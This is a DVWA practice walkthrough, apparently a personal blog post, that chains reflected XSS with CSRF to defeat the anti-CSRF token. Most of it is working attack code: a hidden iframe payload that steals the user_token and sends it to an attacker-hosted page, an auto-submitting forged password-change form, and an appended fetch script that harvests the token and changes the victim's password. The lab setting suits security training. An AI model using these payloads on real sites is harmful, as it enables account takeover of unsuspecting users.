I was training my hacking skills on DVWA, on the CSRF (Cross-Site Request Forgery) attacks, and I wanted an elegant way to orchestrate my attack.
Brief Explanation of CSRF
To keep it simple, a CSRF is an attack that makes the victim's browser send a request without their consent. To get the idea, it could be a link redirecting to :
Without any protection on the website, a victim clicking on this link would change their password without noticing. But it is not that easy (fortunately...): the change_password.php page requires you to be logged in. A way for a hacker to get around this is to inject code into the website itself, so that the request is sent from the victim's own browser with their session cookie (what keeps you logged in on the website) still attached. For that, the hacker needs another exploit to insert code into the website.
The idea of iFrames
<iframe style="display:none" id="iframe" src="http://10.6.66.42/dvwa/vulnerabilities/csrf/" onload="window.open('//10.6.66.64/index.php')"></iframe>
They are very powerful as a hacking tool, since they can be invisible to the user. Here, the iFrame loads the DVWA page and, once loaded, opens a website we are hosting (supposing our IP is 10.6.66.64). The idea will be to inject such an iFrame by exploiting another weakness, and to call our own page, which will submit a form that changes the user's password.
Usually, such an attack needs another weakness. One of the most common exploits that can be chained with a CSRF is an XSS. We are going to test our attack at the high security level of DVWA. First we need to prepare our page. We need to submit a form to http://10.6.66.42/dvwa/vulnerabilities/csrf/, which at this level requires a valid user_token (the anti-CSRF token DVWA embeds in its form). Here is the page we are going to host:
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <title>Exploit</title>
    <!-- do not leak our host in the Referer header of the forged request -->
    <meta name="referrer" content="no-referrer">
    <style type="text/css" media="screen"></style>
  </head>
  <body>
    <!-- same fields DVWA's own change-password form sends, plus the stolen token -->
    <form method="GET" action="http://10.6.66.42/dvwa/vulnerabilities/csrf/" target="csrf-frame" id="csrf-form">
      <input type="hidden" name="password_new" value="password">
      <input type="hidden" name="password_conf" value="password">
      <!-- the token harvested by the iFrame is passed to us as user_moken -->
      <input type="hidden" name="user_token" value="<?php echo $_REQUEST['user_moken']; ?>">
      <input type="hidden" name="Change" value="Change">
    </form>
    <!-- auto-submit as soon as the page is loaded -->
    <script>document.getElementById("csrf-form").submit();</script>
  </body>
</html>
Once the frame has loaded, the token can be read from its DOM (getElementsByName returns a list, hence the [0]):
var moken = this.contentDocument.getElementsByName('user_token')[0].value
Putting it all together, the idea is to inject an iFrame that requests http://10.6.66.42/dvwa/vulnerabilities/csrf/, collects the token from the loaded frame, and passes it to our hosted page. This works because the frame is loaded from the same origin as the page carrying the XSS, so the injected script may read its DOM through contentDocument; a frame from another origin would be blocked by the same-origin policy. We can use the Reflected XSS page to inject our iFrame:
<iframe style="display:none" id="iframe" src="http://10.6.66.42/dvwa/vulnerabilities/csrf/" onload="var moken = this.contentDocument.getElementsByName('user_token')[0].value; window.open('//10.6.66.64/index.php?user_moken=' + moken)"></iframe>
Note that window.open called from an onload handler is not triggered by a user gesture, so popup blockers may stop it; assigning the same URL to this.src instead keeps everything inside the hidden frame.
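The same "harvest the user_token, then forge the change-password request" flow, written as an added example that is not code from the original post: a single same-origin script that could be dropped into the reflected XSS payload in place of the iFrame plus hosted page, using fetch. It assumes a browser with fetch (or Node 18+ for the offline run); the DVWA URL and the field names (password_new, password_conf, Change, user_token) are the post's, the sample form HTML is constructed to mimic DVWA's CSRF page rather than captured, and the function names are my own.

```javascript
// Added example, not code from the original post: the same "harvest the
// user_token, then forge the change-password request" flow done entirely
// from the same origin as the reflected XSS, with fetch instead of an
// iframe plus an attacker-hosted page. TARGET and the field names
// (password_new, password_conf, Change, user_token) are the post's; the
// sample HTML below is constructed to look like DVWA's CSRF form, not a
// captured response; all function names are mine.

const TARGET = 'http://10.6.66.42/dvwa/vulnerabilities/csrf/';

// Constructed stand-in for the CSRF page at security level "high".
const SAMPLE_CSRF_PAGE = `
<form action="#" method="GET">
  New password:<br />
  <input type="password" AUTOCOMPLETE="off" name="password_new"><br />
  Confirm new password:<br />
  <input type="password" AUTOCOMPLETE="off" name="password_conf"><br />
  <br />
  <input type="submit" value="Change" name="Change">
  <input type='hidden' name='user_token' value='0123456789abcdef0123456789abcdef' />
</form>`;

// Pull the anti-CSRF token out of a page body, accepting either quote style
// and either attribute order. Returns null when there is no token (lower
// security levels, or a session that is not logged in).
function extractUserToken(html) {
  const m = html.match(/name=['"]user_token['"][^>]*?value=['"]([^'"]+)['"]/i)
         || html.match(/value=['"]([^'"]+)['"][^>]*?name=['"]user_token['"]/i);
  return m ? m[1] : null;
}

// Build the GET request that DVWA's own form would send.
function buildChangePasswordUrl(base, token, newPassword) {
  const u = new URL(base);
  u.searchParams.set('password_new', newPassword);
  u.searchParams.set('password_conf', newPassword);
  u.searchParams.set('Change', 'Change');
  u.searchParams.set('user_token', token);
  return u.toString();
}

// Fetch the form with the victim's cookies, read the token, fire the forged
// request. Reading the response body is only possible because the script
// runs on the DVWA origin (same-origin policy); a cross-origin fetch would
// give an opaque or blocked response. fetchImpl is injectable so the flow
// can be exercised offline; in a browser, leave the default.
async function harvestAndChangePassword(base, newPassword, fetchImpl = globalThis.fetch) {
  const page = await fetchImpl(base, { credentials: 'include' });
  const token = extractUserToken(await page.text());
  if (token === null) {
    throw new Error('no user_token in response: not logged in, or no token at this level');
  }
  const url = buildChangePasswordUrl(base, token, newPassword);
  const res = await fetchImpl(url, { credentials: 'include' });
  const body = await res.text();
  return { token, url, changed: /Password Changed/i.test(body) };
}

// Offline fetch stand-in: first call returns the constructed form, the
// second the success page; every requested URL is recorded in log.
function fakeFetch(log) {
  return async (url) => {
    log.push(String(url));
    const body = log.length === 1 ? SAMPLE_CSRF_PAGE : '<pre>Password Changed.</pre>';
    return { text: async () => body };
  };
}

// Stand-alone demo against the fake; in the XSS payload this would be
// harvestAndChangePassword(TARGET, 'password') with the real fetch.
if (typeof require !== 'undefined' && require.main === module) {
  const log = [];
  harvestAndChangePassword(TARGET, 'password', fakeFetch(log))
    .then((r) => console.log(r, log));
}
```

Because the request carries the victim's cookies and the token is read from a same-origin response, this needs no second host, no popup and no Referer handling; it also fails loudly (the thrown error) when the token is absent, which is the case to check first when a payload "does nothing" at a given security level.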